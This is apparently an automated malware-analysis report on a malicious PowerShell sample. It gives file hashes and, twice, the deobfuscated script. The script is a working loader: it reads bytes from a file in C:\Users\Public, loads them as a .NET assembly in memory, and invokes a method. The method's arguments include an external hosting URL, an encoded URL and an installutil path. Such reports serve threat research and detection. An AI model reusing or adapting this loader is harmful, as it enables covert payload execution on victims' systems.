Malicious
Malicious

a7fce5a5fba08f721712adb26bc4553d

PowerShell
|
MD5: a7fce5a5fba08f721712adb26bc4553d
|
Size: 1.65 KB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
a7fce5a5fba08f721712adb26bc4553d
Sha1
3302da86f9a40311bb3a7ca1d28c1560d5a6ba5b
Sha256
f875444b519bce683ab8e1d4725713a47c07a126aa420db8fc360c9652259cac
Sha384
0e59065c343754a8966695bc2d6a88f8490ca6ef87e51d159373f56dcfc6f89b270c98b20cb65a2516e884313df18e31
Sha512
05c8ac1cede1824169c5e0a16aec24ea06648feacd147c2f90b8d840119d6d68b849ab3d0c12c6d04015916e20f0cbc9b0b909d9f10038b9fb9d488bf643e391
SSDeep
48:pAlbx5Qh2QaAAU0rXtrVJR/RpreSkde4OggzAM5MxzQw:pQbfQh2QadUwz3Sve4mzExkw
TLSH
5731495066F99608B2B35D04EAFF65528C3B7B7E9D7ACA0D0050D14E17A1A44CDBBF32
File Structure
a7fce5a5fba08f721712adb26bc4553d
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeNo" $zgHoW = "%base64%dHh0LmIvbW9jLmt1cXVzY2MuZG0vLzpzcHR0a緒==" $zgHoW = ($zgHoW -replace @("緒", "A")) $cTFzN = "C:\Users\Public\tqkdp.txt" $qbczm = (Get-Content -Path $cTFzN -Encoding "UTF8") $qbczm -replace @(" ", "") [byte[]] $ltcjm = [List`1]::"new"() $ltcjm = ($qbczm -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($ltcjm) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($RvhDi, [object[]] (@($zgHoW, "C:\Users\Public\grddz的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ)))
a7fce5a5fba08f721712adb26bc4553d (1.65 KB)
File Structure
a7fce5a5fba08f721712adb26bc4553d
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeNo" $zgHoW = "%base64%dHh0LmIvbW9jLmt1cXVzY2MuZG0vLzpzcHR0a緒==" $zgHoW = ($zgHoW -replace @("緒", "A")) $cTFzN = "C:\Users\Public\tqkdp.txt" $qbczm = (Get-Content -Path $cTFzN -Encoding "UTF8") $qbczm -replace @(" ", "") [byte[]] $ltcjm = [List`1]::"new"() $ltcjm = ($qbczm -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($ltcjm) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($RvhDi, [object[]] (@($zgHoW, "C:\Users\Public\grddz的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ)))

Malicious

a7fce5a5fba08f721712adb26bc4553d
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙